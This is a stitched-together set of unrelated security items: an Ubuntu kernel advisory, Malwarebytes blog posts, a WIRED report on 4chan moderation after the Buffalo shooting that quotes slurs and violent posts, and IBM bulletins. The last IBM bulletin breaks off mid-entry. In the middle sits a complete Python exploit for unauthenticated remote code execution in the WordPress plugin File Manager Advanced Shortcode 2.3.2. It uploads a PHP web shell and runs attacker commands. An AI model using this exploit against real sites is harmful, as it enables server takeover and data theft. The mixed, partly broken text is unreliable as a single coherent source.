Ubuntu Security Notice 6135-1 - Patryk Sondej and Piotr Krysiuk discovered that a race condition existed in the netfilter subsystem of the Linux kernel when processing batch requests, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. Gwangun Jung discovered that the Quick Fair Queueing scheduler implementation in the Linux kernel contained an out-of-bounds write vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6135-1  
June 02, 2023

linux-azure-fde, linux-azure-fde-5.15 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-azure-fde: Linux kernel for Microsoft Azure CVM cloud systems  
- linux-azure-fde-5.15: Linux kernel for Microsoft Azure CVM cloud systems

Details:

Patryk Sondej and Piotr Krysiuk discovered that a race condition existed in  
the netfilter subsystem of the Linux kernel when processing batch requests,  
leading to a use-after-free vulnerability. A local attacker could use this  
to cause a denial of service (system crash) or possibly execute arbitrary  
code. (CVE-2023-32233)

Gwangun Jung discovered that the Quick Fair Queueing scheduler  
implementation in the Linux kernel contained an out-of-bounds write  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2023-31436)

Reima Ishii discovered that the nested KVM implementation for Intel x86  
processors in the Linux kernel did not properly validate control registers  
in certain situations. An attacker in a guest VM could use this to cause a  
denial of service (guest crash). (CVE-2023-30456)

It was discovered that the Broadcom FullMAC USB WiFi driver in the Linux  
kernel did not properly perform data buffer size validation in some  
situations. A physically proximate attacker could use this to craft a  
malicious USB device that when inserted, could cause a denial of service  
(system crash) or possibly expose sensitive information. (CVE-2023-1380)

Jean-Baptiste Cayrou discovered that the shiftfs file system in the Ubuntu  
Linux kernel contained a race condition when handling inode locking in some  
situations. A local attacker could use this to cause a denial of service  
(kernel deadlock). (CVE-2023-2612)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   linux-image-5.15.0-1039-azure-fde  5.15.0-1039.46.1  
   linux-image-azure-fde           5.15.0.1039.46.16

Ubuntu 20.04 LTS:  
   linux-image-5.15.0-1039-azure-fde  5.15.0-1039.46~20.04.1.1  
   linux-image-azure-fde           5.15.0.1039.46~20.04.1.18

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6135-1  
   CVE-2023-1380, CVE-2023-2612, CVE-2023-30456, CVE-2023-31436,  
   CVE-2023-32233

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-azure-fde/5.15.0-1039.46.1

 https://launchpad.net/ubuntu/+source/linux-azure-fde-5.15/5.15.0-1039.46~20.04.1.1

Ubuntu Security Notice USN-6135-1

File Manager Advanced Shortcode version 2.3.2 suffers from a remote code execution vulnerability.

    # Exploit Title: File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution (RCE)# Date: 05/31/2023# Exploit Author: Mateus Machado Tesser# Vendor Homepage: https://advancedfilemanager.com/# Version: File Manager Advanced Shortcode 2.3.2# Tested on: Wordpress 6.1 / Linux (Ubuntu) 5.15# CVE: CVE-2023-2068import requestsimport jsonimport pprintimport sysimport rePROCESS = "\033[1;34;40m[*]\033[0m"SUCCESS = "\033[1;32;40m[+]\033[0m"FAIL = "\033[1;31;40m[-]\033[0m"try:  COMMAND = sys.argv[2]  IP = sys.argv[1]  if len(COMMAND) > 1:    pass  if IP:    pass  else:    print(f'Use: {sys.argv[0]} IP COMMAND')except:  passurl = 'http://'+IP+'/' # Path to File Manager Advanced Shortcode Panelprint(f"{PROCESS} Searching fmakey")try:  r = requests.get(url)  raw_fmakey = r.text  fmakey = re.findall('_fmakey.*$',raw_fmakey,re.MULTILINE)[0].split("'")[1]  if len(fmakey) == 0:    print(f"{FAIL} Cannot found fmakey!")except:  print(f"{FAIL} Cannot found fmakey!")print(f'{PROCESS} Exploiting Unauthenticated Remote Code Execution via AJAX!')url = "http://"+IP+"/wp-admin/admin-ajax.php"headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryI52DGCOt37rixRS1", "Accept": "*/*"}data = "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"reqid\"\r\n\r\n\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hashes[l1_cG5nLWNsaXBhcnQtaGFja2VyLWhhY2tlci5wbmc]\"\r\n\r\nexploit.php\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nfma_load_shortcode_fma_ui\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"_fmakey\"\r\n\r\n"+fmakey+"\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"path\"\r\n\r\n\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"url\"\r\n\r\n\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"w\"\r\n\r\nfalse\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"r\"\r\n\r\ntrue\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hide\"\r\n\r\nplugins\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"operations\"\r\n\r\nupload,download\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"path_type\"\r\n\r\ninside\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hide_path\"\r\n\r\nno\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"enable_trash\"\r\n\r\nno\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload_allow\"\r\n\r\ntext/x-php\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload_max_size\"\r\n\r\n2G\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"exploit2.php\"\r\nContent-Type: text/x-php\r\n\r\n<?php system($_GET['cmd']);?>\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"mtime[]\"\r\n\r\n\r\n------WebKitFormBoundaryI52DGCOt37rixRS1--\r\n"r = requests.post(url, headers=headers, data=data)print(f"{PROCESS} Sending AJAX request to: {url}")if 'errUploadMime' in r.text:  print(f'{FAIL} Exploit failed!')  sys.exit()elif r.headers['Content-Type'].startswith("text/html"):  print(f'{FAIL} Exploit failed! Try to change _fmakey')  sys.exit(0)else:  print(f'{SUCCESS} Exploit executed with success!')exploited = json.loads(r.text)url = ""print(f'{PROCESS} Getting URL with webshell')for i in exploited["added"]:  url = i['url']print(f"{PROCESS} Executing '{COMMAND}'")r = requests.get(url+'?cmd='+COMMAND)print(f'{SUCCESS} The application returned ({len(r.text)} length):\n'+r.text)

File Manager Advanced Shortcode 2.3.2 Remote Code Execution

Internal company documents reveal how the imageboard’s chaotic moderation allowed racism and violence to take over.

On May 14, 2022, 18-year-old Payton Gendron sent out a link to a select group of online friends. It was an invite to a private Twitch stream, access to his running online diary, and an upload of his 180-page manifesto.

Those who clicked the link saw Gendron sitting in his car, in the parking lot of the Tops supermarket in Buffalo, New York. They watched as he lifted his AR-15-style rifle, equipped with a high-capacity magazine, and opened fire. He killed 10 people in just six minutes.

Even before police stopped the massacre and arrested Gendron, the link was being posted to the anonymous imageboard 4chan. On /pol/, the site’s “politically incorrect” board, people commented in real time on the mass shooting. “Why not shoot up the abortion rallys? What a faggot,” one user wrote. Another chimed in: “The kids manifesto is actually pretty good.” Dozens of people who missed the livestream demanded a recording. Others declared it a deep-state false flag operation.

One poster, however, was imploring the site’s users to accept responsibility. “Why is this place so full of hate and anger?” they asked. “It's like a den of inequity \[sic\]. Why don't you people ever express love or compassion?” They uploaded a photo of Payton Gendron, and named the file “the 4chan killer.”

“You made Payton Gentron \[sic\], a sociopathic mass murderer,” they wrote. 

4chan’s moderators soon jumped in and banned the user's account, deleting their comment. The reason for the ban: “Complaining about 4chan.”

The way in which 4chan is managed and moderated is of growing interest among US government officials. The US House of Representatives' January 6 committee subpoenaed 4chan over its role in facilitating the assault on the US Capitol, while investigators with the New York Attorney General’s Office ordered the company to turn over thousands of records to better understand its role in Gendron’s terrorist attack. WIRED obtained a number of internal 4chan documents through a public records request. 

Those documents show how 4chan’s team of moderators—janitors, in their own nomenclature—manage the site. Internal emails, chat logs, and moderation decisions reveal how the site’s janitors have helped shape it in their own image, using their moderation powers to engender 4chan’s particular brand of edgelord white supremacy. In particular, the documents show how the site’s moderators responded to a wave of attention as their website had, once more, been cited as an ideological driver for an act of mass murder. 

More than that, the documents lay bare the degree to which 4chan’s toxic influence is a design, not a bug.

In his manifesto, Gendron credited 4chan with showing him “the truth”—that is, a deeply paranoid and racist belief that “the White race is dying out.” He selected the Tops supermarket specifically because it was in a predominantly Black neighborhood. 4chan, too, told him what to do about it. Years earlier, browsing the site, he had come across a video of 28-year-old Brenton Tarrant stalking through the Al Noor mosque in Christchurch, New Zealand, in 2019, murdering 51 people.

In launching the attack in Buffalo, Gendron was following in Tarrant’s footsteps. He even liberally plagiarized Tarrant’s manifesto. And he made regular use of 4chan’s insular, hateful lexicon of memes and in-jokes.

While Gendron has pled guilty to murder, domestic terrorism, and hate crimes charges, and is awaiting trial on additional federal charges, the families of some of the victims have filed a lawsuit against a number of social media companies, including 4chan, Discord, Reddit, Snapchat, Alphabet, Meta, and Amazon. They allege that Gendron’s radicalization was caused by an inability, or outright refusal, by these companies to stem the flow of violent conspiracy theories online.

Many of the companies named, however, do make a concerted effort to remove extremist content. But 4chan is markedly different. Its rules and moderation practices entrench its politics and culture in a major way. What is and isn’t allowed on the imageboard helps explain how it has become a website where racial slurs are used like commas, and where users frequently counsel each other to die by suicide and take as many people with them as they can.

Its rules are simultaneously more onerous and more permissive than other social media sites. 4chan has 17 “Global Rules.” The first forbids any content that violates US law. “Any sort of threat of violence or terroristic acts would violate Global Rule #1,” the 4chan administrators wrote to the New York attorney general.

Another rule, technically, bans racism—except on /b/, 4chan’s “random” board. There, racism is both allowed and encouraged. 4chan leadership confessed to the New York Attorney General’s Office that they take a permissive attitude towards racism on the /pol/ board as well. It is a similar approach to how 4chan handles “My Little Pony” content. (“All pony/brony threads, images, Flashes, and avatars belong on /mlp/,” the rules read.)

The site’s Global Rules are augmented by hundreds of other board-specific rules. In practice, however, 4chan users know that the application of these rules is often arbitrary and that much depends on the moderator enforcing them. The janitors are free to deem just about anything “off-topic,” or to just make up their own rules as they go.

According to 4chan’s filings to the New York Attorney General’s Office, the website regularly issues between 5,000 and 7,000 bans per day. That doesn’t include post deletions that do not result in an IP address ban. The website’s paid administrators submitted over 500 ban records to the state of New York, all of which touched—at least tangentially—on Gendron’s massacre in Buffalo.

Roughly 60 percent of those bans were because posts were off-topic, or on the wrong board. One person, for example, was banned for posting in /k/, the weapons board used by Gendron to pick his gear and prepare for his attack, to ask, “At what point do you people acknowledge we need some sort of restrictions or controls in this country?” The board’s rules state that “All images and discussion should pertain to firearms, military vehicles, knives, realistic mil-sim games, and other weapons.” (/k/ has just one board-specific rule: “All weaponry is welcome.”)

According to the cross-section of bans provided to New York, which were issued in the days after the Buffalo mass shooting, 21 bans were imposed for violating US law. Some of those were, as 4chan pointed out to the Attorney General’s Office, for counseling for further terror attacks. The posts encouraged fellow 4chan users to kill politicians, journalists, law enforcement officials, Jewish and Black people, and to target Pride events. 

In practice, however, the majority of calls for violence on 4chan do not result in bans. Users frequently make calls to instigate a race war—a “boogaloo,” in far-right parlance—or make threats against individuals or whole classes of people. Their vitriol is particularly vile when it comes to Black, queer, and Jewish people.

Users counsel each other to “go full ER”—a reference to Elliot Rodger, who, aged 22, murdered six people at his university in Isla Vista, California, in 2014 before dying by suicide. That kind of encouragement has been reflected back to 4chan by those who follow through on acts of violence. When 25-year-old Alek Minassian rammed a van through a crowd  of people in Toronto, Canada, in 2018, killing 11 and injuring 15, some critically, he uploaded a post to Facebook immediately beforehand, making a convoluted reference to “Sgt 4chan” and the “Supreme Gentleman Elliot Rodger!”

Mike Chitwood, the sheriff of Florida’s Volusia County, has gone out of his way to underscore just how prevalent these violent threats are on 4chan. His office has arrested multiple 4chan users for issuing specific threats against the sheriff himself. Users, undeterred and without reprimand from moderators, have responded with posts like: “Kill Sheriff Shitwood.” “Behead Sheriff Shitwood.” “Roundhouse kick Sheriff Shitwood into the concrete.”

One particularly conspiratorial and racist poster, who sported a Nazi flag icon, was more blunt than many of their fellow users about 4chan’s toxic impact: “Hoping some kid reads this.. kinda keeps it in the back of his mind.. then if all things and chances fall in place then those kids may start a boogaloo in the future.”

4chan wasn’t always a hotbed of racial animus and hatred. When its founder, Chris Poole, ran the site, he was locked in a constant effort to keep it from sliding into racist chaos. Right until he quit the site in 2015, Poole actively resisted its emerging political streak. Initially, the imageboard trended towards a progressive libertarianism epitomized by the hacktivist group Anonymous. With time, however, it developed a harder edge.

At one point, 4chan had been organizing raids on the notorious neo-Nazi forum Stormfront. But around 2010, Poole was reckoning with the fact that some of the boards on his website had essentially “become Stormfront,” as Dale Beran writes in _It Came From Something Awful._

In 2011, Poole created /pol/ explicitly to contain this growing far-right attitude, hoping it would spread no further. It didn’t work. “Rather, 4chan’s new neo-Nazi section thrived,” Beran writes.

Poole would keep trying, in vain, to stem the growing vitriol. In 2014, the anti-feminist Gamergate movement took hold on 4chan. Poole tried to ban all discussions of Gamergate, but the reactionary ethos of the movement seeped into the website just the same.

Soon after, Poole lost his stomach for the fight. In 2015 he sold the site to Hiroyuki Nishimura, a Japanese internet tycoon and founder of 2channel, on which 4chan is based. Nishimura, backed by millions of dollars in investment from Japanese toy company Good Smile, became the sole owner of 4chan. But his involvement has been largely hands-off. To help manage, moderate, and cultivate the imageboard, he enlisted the help of one of its most senior janitors: RapeApe.

The senior moderator, sometimes referred to as “GrapeApe,” has exercised an enormous influence on 4chan over the past decade. As one former moderator told Motherboard in 2020, “RapeApe has an agenda: He wants /pol/ to have an influence on the rest of the site and \[its\] politics.”

Documents turned over to New York investigators reveal that 4chan signed an agreement to pay RapeApe $3,000 a month for their services in 2015. By May 2022, that fee had risen to $4,400 a month. (RapeApe is one of very few 4chan staff who receive a salary.)

Tasked with compiling these records for the New York attorney general, Nishimura offered them some overtime. “Could you add $1000 with an invoice for next month?” Nishimura wrote to RapeApe in 2022. “New York Attorney General paper works takes so much \[of\] your time. Thank you so much for you work!”

After the Buffalo terrorist attack, one user posted a link to the Motherboard story to multiple sections of 4chan and laid the carnage at RapeApe’s feet. “I’ve been saying for years that rapeape’s /pol/tardation would result in severe consequences, and the mass shooting in Buffalo has proven me right,” they wrote. “Therefore, the only possible way to save this website is to have him doxxed, hunted down, and murdered.”

The user was banned for violating US law.

In the hour after Gendron’s attack, 4chan’s moderators congregated in a chat room.

“Apparently today's mass shooter makes 4chan responsible in his manifesto,” one janitor, Astria, wrote. “4chan being associated with such an atrocity is the last thing I wanted.” The moderators hoped it was fake. “You couldn’t do a better job at making 4chan look bad.” 

Another janitor, Troid, wondered why they should bother discussing the mass murder. “What's the point of even mentioning it? unless we plan to do something about it, which we don't.”

“Be easy on him troid, its his first 4chan mass shooter as a mod ;^),” wrote a third janitor, yournamehere.

Janitor Aeolian jumped in to insist it wasn’t their fault. “IMO this guy is an 8chan user, not really a 4chan user. I also think we do a really good job moderating potential threats. I don’t feel we’re lacking anywhere on the site in that regard.”

In his manifesto, however, Gendron credits 4chan with his radicalization. While he credits 8chan as well, Gendron heaps praise on /pol/ and /k/, the guns board, for showing him the “truth” and helping him maximize his chances of carnage.

“I got a lot of information from Plateland; a discord I found on 4chan’s /k/ board (love you guys),” Gendron wrote.

Troid wasn’t as quick to dismiss 4chan’s role. “There are in fact threads about the great replacement on /pol/,” they wrote. “Let's not pretend we don't know what the connection is and why people would question 4chan in this instance.”

The other janitors—whose display names in the chat do not necessarily correspond to their 4chan usernames—agreed. But in the ensuing hours and days, the conversation in the chat room drifted away from self-reflection. The moderators shifted blame onto other websites (“If he was on 4chan he wasn’t ‘from’ here.”), mocked federal agencies trying to investigate the litany of threats posted to the website (“We get tons of emails about each moron who makes one of those troll posts”), and lauded their own moderation efforts.

In the chat room, set up to help janitors discuss their moderation practices, a junior janitor asked if requesting or sharing the video of the massacre violated the rules. “It’s prolly fine,” replied CIAeolian, a more senior moderator. (It’s unclear from the documents whether Aeolian and CIAeolian are the same person.) The debate turned toward which channel was the best placed to host recordings of the livestream.

CIAeolian replied later with a clarification on 4chan’s first rule. Violating US law, they said, is “serious” and comes with “a long ban duration.” So it should be reserved for the most obvious violations, they added. ”E.g. ‘I’m going to commit a crime at date, time, place, location’ or ‘How do I acquire \[illegal thing\]?’” 

Nearly a week after the Buffalo terrorist attack, RapeApe and dsw—two moderators on 4chan’s payroll—had a conversation about the fallout. They had just received notice from their advertising platform, Bid.Glass, that 4chan was being dropped.

“We just got a termination notice from Bid.Glass. I'm going to try to talk him out of it (it's basically one dude running the company), but in the likely event that fails we are going to need some kind of replacement,” RapeApe wrote. They continued: “So far neither the FBI nor the local police have any evidence that the shooter posted on 4chan at all.” 

RapeApe lamented that 4chan was “getting the shaft” as other websites, like Reddit and Discord, were being let off “scot free.” 

Reddit, however, aggressively moderates communities known to be advocating racism and violence—and it has outright banned a litany of far-right and incel communities. In his diary, Gendron wrote, “Many subreddits I joined have been banned.” Discord, meanwhile, took a number of steps to improve moderation in the wake of the Buffalo shooting, including banning the community where Gendron got tactical advice and partnering with the Global Internet Forum to Counter Terrorism. While it remains to be seen how effective those kinds of tactics are, Reddit and Discord can claim they are taking some action.

4chan, meanwhile, seems determined to change as little as possible, even if it could mean more acts of domestic terrorism carried out by its users.

“This will never change unfortunately,” dsw wrote. “Unless we do soemthing \[sic\] drastic like removing pol and all other random boards,” they wrote. RapeApe dismissed the suggestion less than 20 seconds later. “Even if we do none of these companies are going to accept us.”

“They might, if 4chan rebrands itself,” dsw replied. But RapeApe wasn’t swayed.

“That’s naive.”

Inside 4chan’s Top-Secret Moderation Machine

Categories: Personal
It’s time to shake off that special feeling, start lying, forget everything you’ve been told about passwords, spin up a million email addresses, and start throwing away computers for fun.



(Read more...)




The post 5 unusual cybersecurity tips that actually work appeared first on Malwarebytes Labs.

So, you’re on top of your software updates, you use a password manager, you’ve enabled two-factor authentication wherever you can, you’ve got BrowserGuard installed, and you’re running Malwarebytes Premium.

If you're doing all of that you're already winning at security. But you want more, because you know that security is a journey and not a destination, and, let’s face it, you’re reading an article about five unusual cybersecurity tips: You’re hooked.

It's time to innovate and get weird. It’s time to shake off that special feeling, start lying, forget everything you’ve been told about passwords, spin up a million email addresses, and start throwing away computers for fun.

It's time for five unusual cybersecurity tips that actually work:

**1\. Lie**

Generally speaking, the fewer pieces of data you hand out, the safer you are. If a site is asking for data you don't want to share, remember: Sometimes it's OK to lie.

If a site wants a phone number and you don't want them to call you, fake it. (00000000000 is surprisingly effective.) If the site won't accept your made up number, don't worry. Lists of fake numbers that look right for your country but don't work are a short Google search away. It works for other data too, even fake credit card numbers—you won't be able to buy anything with one, but neither will anyone who steals it.

**2\. Stop thinking you're special**

Everyone is a star in their own story, so when we unexpectedly get a message from a lonely young Russian lady who's recently moved to our town, a Nigerian Prince promises us riches, "Keanu Reeves" follows us on Instagram, or we stumble upon the crypto-opportunity of a lifetime, our exceptionalism can kick in.

If it happened to somebody else, we'd be sceptical, but when it happens to us...well, we had a feeling our luck was about to turn! Burst that bubble. If something looks too good to be true, it isn't because you're special, it’s because it IS too good to be true. Sorry.

**3\. Forget strong passwords**

For years you've been told to make unreadable passwords with a of mix uppercase letters, lowercase letters, and wacky characters. That is still important, but reusing passwords over and over again is actually _much_ worse than having lots of different, weaker, passwords.

If a thief can steal your password from anywhere, they will try to use it everywhere, and if the same password works everywhere, you've lost everything. Your goal should be to create a new password for each service you use. Focus on simply avoiding really awful passwords, like "password" or "12345", and save the unreadable passwords for things that really matter, like your bank.

**4\. Use endless email addresses**

Look at your inbox for a few minutes and you’ll probably start to wonder “how did _they_ get my email address?” In between the messages from friends and colleagues, and the newsletters you signed up for but never read, there is always a smattering of speculative nonsense from people who have no business using your email address.

One way of getting on top of that problem is to use different email address for each account you sign up for. Apple will do this for you with its Hide My Email feature, and if you use Gmail you can just add a "+" to the name part of your address followed by anything you like, e.g. john.doe+malwarebytes@gmail.com.

Each unique address should only get messages from the site where you used it. If any other sites use it, you know that your data has been leaked, stolen or sold. If that happens, block the email address and consider closing your account on that site.

**5\. Throw your computer away**

If you want to say super-safe, just browse the internet using a computer with no sensitive data on it, and throw it away when you've finished, simple!

OK, it sounds expensive, but you can do it for free with tools like Oracle's VirtualBox. Virtual Machines (VMs) are computers made of software instead of plastic, metal, and silicon, that run on your computer just like any other program. You can run Windows, your web browser of choice, and all your other favourite apps inside a VM, where they are totally isolated from your real computer.

Like trips to Vegas, whatever happens on a VM stays on a VM. And because VMs can be cloned, rolled back, or destroyed with a mouse click, if anything bad happens on yours you can simply trash it and start a new one.

If you've got an unusual cybersecurity tip, we'd love to hear it. Leave it in the comments below.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

5 unusual cybersecurity tips that actually work

Categories: Podcast
This week on Lock and Code, we ask whether AI can lie and whether companies and individuals are placing too much trust into tools like ChatGPT. 



(Read more...)




The post Trusting AI not to lie: The cost of truth: Lock and Code S04E12 appeared first on Malwarebytes Labs.

In May, a lawyer who was defending their client in a lawsuit against Columbia's biggest airline, Avianca, submitted a legal filing before a court in Manhattan, New York, that listed several previous cases as support for their main argument to continue the lawsuit.

But when the court reviewed the lawyer's citations, it found something curious: Several were entirely fabricated. 

The lawyer in question had gotten the help of another attorney who, in scrounging around for legal precedent to cite, utilized the "services" of ChatGPT. 

ChatGPT was wrong. So why do so many people believe it's always right? 

Today, on the Lock and Code podcast with host David Ruiz, we speak with Malwarebytes security evangelist Mark Stockley and Malwarebytes Labs editor-in-chief Anna Brading to discuss the potential consequences of companies and individuals embracing natural language processing tools—like ChatGPT and Google's Bard—as arbiters of truth. Far from being understood simply as chatbots that can produce remarkable mimicries of human speech and dialogue, these tools are becoming sources of truth for countless individuals, while also gaining attraction amongst companies that see artificial intelligence (AI) and large language models (LLM) as the future, no matter what industry they operate in. 

The future could look eerily similar to an earlier change in translation services, said Stockley, who witnessed the rapid displacement of human workers in favor of basic AI tools. The tools were far, far cheaper, but the quality of the translations—of the truth, Stockley said—was worse. 

> "That is an example of exactly this technology coming in and being treated as the arbiter of truth in the sense that there is a cost to how much truth we want."

Tune in today. 

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use. 

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

Trusting AI not to lie: The cost of truth: Lock and Code S04E12

[PROBLEMTYPE] in [COMPONENT] in [VENDOR] [PRODUCT] [VERSION] on [PLATFORMS] allows [ATTACKER] to [IMPACT] via [VECTOR]

  

**Summary**

IBM Security Guardium has addressed these vulnerabilities.

**Vulnerability Details**

**CVEID:**   CVE-2023-0041  
**DESCRIPTION:**   IBM Security Guardium could allow a user to take over another user's session due to insufficient session expiration.  
CVSS Base score: 6.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/243657 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L)

**CVEID:**   CVE-2023-22809  
**DESCRIPTION:**   Sudo could allow a local authenticated attacker to gain elevated privileges on the system, caused by mishandling extra arguments passed in the user-provided environment variables. By appending arbitrary entries to the list of files to process, an attacker could exploit this vulnerability to achieve privilege escalation.  
CVSS Base score: 7.8  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/245036 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)

**CVEID:**   CVE-2019-12490  
**DESCRIPTION:**   Simple Machines Forum (SMF) could allow a remote attacker to bypass security restrictions, caused by a reverse tabnabbing flaw. By persuading a victim to visit a specially-crafted Web site, an attacker could exploit this vulnerability to obtain credentials.  
CVSS Base score: 5.4  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/175609 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)

**Affected Products and Versions**

**Affected Product(s)**

**Version(s)**

IBM Security Guardium

11.5

  

**Remediation/Fixes**

**Workarounds and Mitigations**

None

**References**

Off

**Change History**

30 May 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSMPHH","label":"IBM Security Guardium"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"}\],"Version":"11.5","Edition":"","Line of Business":{"code":"LOB24","label":"Security Software"}}\]

CVE-2023-0041: IBM Security Guardium is affected by a multiple vulnerabilities (CVE-2023-22809, CVE-2019-12490, CVE-2013-0041)

Categories: News
Tags: week in security

A list of topics we covered in the week of May 29 - June 4 of 2023



(Read more...)




The post A week in security (May 29 - June 4) appeared first on Malwarebytes Labs.

Cybersecurity info you can't do without

Want to stay informed on the latest news in cybersecurity? Sign up for our newsletter and learn how to protect your computer from threats.

Cyberprotection for every one.

FOR PERSONAL

Windows Antivirus

Mac Antivirus

iPhone Antivirus

Android Antivirus

Free Antivirus

VPN App (All Devices)

SEE ALL

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

FOR BUSINESS

Small Businesses

Mid-size Businesses

Large Enterprise

Endpoint Protection

Endpoint Detection & Response

Managed Detection and Response (MDR)

FOR PARTNERS

Managed Service Provider (MSP) Program

Resellers

MY ACCOUNT

Sign In

SOLUTIONS

Free Rootkit Scanner

Free Trojan Scanner

Free Virus Scanner

Free Spyware Scanner

Anti Ransomware Protection

SEE ALL

ADDRESS

3979 Freedom Circle  
12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay  
2nd Floor  
Cork T12 X8N6  
Ireland

LEARN

Malware

Hacking

Phishing

Ransomware

Computer Virus

Antivirus  

What is VPN?

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

MY ACCOUNT

Sign In

ADDRESS

3979 Freedom Circle, 12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay, 2nd Floor  
Cork T12 X8N6  
Ireland

A week in security (May 29 - June 4)

IBM Aspera Connect 4.2.5 and IBM Aspera Cargo 4.2.5 transmits authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval.  IBM X-Force ID:  244107.

  

**Summary**

This Security Bulletin addresses security vulnerabilities that have been remediated in IBM Aspera Connect 4.2.6 and IBM Aspera Cargo 4.2.6.

**Vulnerability Details**

**CVEID:**   CVE-2023-22862  
